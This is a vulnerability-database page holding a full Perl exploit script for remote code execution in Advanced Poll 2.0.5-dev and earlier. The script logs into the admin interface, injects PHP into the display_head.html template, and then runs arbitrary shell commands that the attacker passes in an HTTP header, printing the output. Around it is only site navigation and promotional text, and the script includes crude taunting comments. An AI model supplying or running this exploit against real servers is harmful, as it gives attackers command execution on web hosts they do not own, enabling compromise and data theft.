Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit

🗓️ 13 Feb 2007 00:00:00Reported by diwouType 
zdt
 zdt🔗 0day.today👁 33 Views

Advanced Poll 2.0.5-dev Remote Code Execution Exploit using Perl script to inject code into the display_head template and execute commands via the admin interface

Code
========================================================
Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit
========================================================




#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'
# url: http|https://tatget:(port)/phppoll/
#

die("RTFC! ;)") unless(@ARGV>1);

my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);

my %ipost=
(
	poll_tplset => 'default',
	'tpl[display_head.html]' =>
<<HEAD
\\".system(getenv(HTTP_PHP)).exit().\\"
<table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars[bgcolor_fr]">
  <tr align="center">
    <td><style type="text/css">
       <!--
        .input { font-family: \$pollvars[font_face]; font-size: 8pt}
        .links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]}
       -->
      </style><font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"><b>\$pollvars[title]</b></font></td>
  </tr>
  <tr align="center">
    <td>
      <table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]">
        <tr>
          <td height="40" valign="middle"><font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"><b>\$question</b></font></td>
        </tr>
        <tr align="right" valign="top">
          <td>
            <form method="post" action="\$this->form_forward">
            <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
              <tr valign="top" align="center">
                <td>
                  <table width="100%" border="0" cellspacing="0" cellpadding="1" align="center">
HEAD
,
	action   =>  '',
	tplset   =>  'default',
	tpl_type =>  'display',
	session  =>  '',
	uid      =>  1
);

my %epost=
(
	session    => '',
	uid        => 1,
	poll_tplst => 'default',
	tpl_type   => 'display',
);

my %zday=
(
	username => 'jakahw4nk4h',
	'pollvars[poll_username]' => 'jakahw4nk4h',
	password => 'fuckoff',
	'pollvars[poll_password]' => ''
);

$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);

if($ENV{PROXY})
{
	$lwp->proxy(['http','https'],$ENV{PROXY});
	print "Using proxy ".$ENV{PROXY}."\n";
}

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Doing some pretty with ".$url."...\n\n";

print "+ generating session...\n";
$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
	$ipost{'session'}=$epost{'session'}=$1;
	print "  session: ".$ipost{'session'}."\n";
	
	$url=~s/index\.php/admin_templates\.php/g;
	print "+ injecting diplay_head.html template...\n";
	$out=$lwp->post($url,\%ipost)->content();
	$epost{'action'}=$1 if($out=~ /<input type="submit" name="action" value="(.*)" class="button">/);
	print "  button: ".$epost{'action'}."\n";

	$url=~s/admin_templates\.php/admin_preview\.php/g;
	print "+ executing...\n";
	$out=$lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE")->content();

	print "-- BOCE --\n";
	foreach $out (split(/\n/,$out))
	{
		$res=1,next if($out=~/BOCE/);
		$res=0,next if($out=~/EOCE/);
		print $out."\n" if($res);
	}
	print "-- EOCE --\n";
}
else
{
	print "don't worry, u can improve me! eh eh eh :D?\n";
}

sub md5
{
	$_=new MD5;
	$_->add(@_);
	return unpack("H*",$_->digest());
}



#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1
advanced poll 2.0.5-devremote code executionperl scriptdisplay_head templateadmin interfacecommand injectionlwp::useragent
33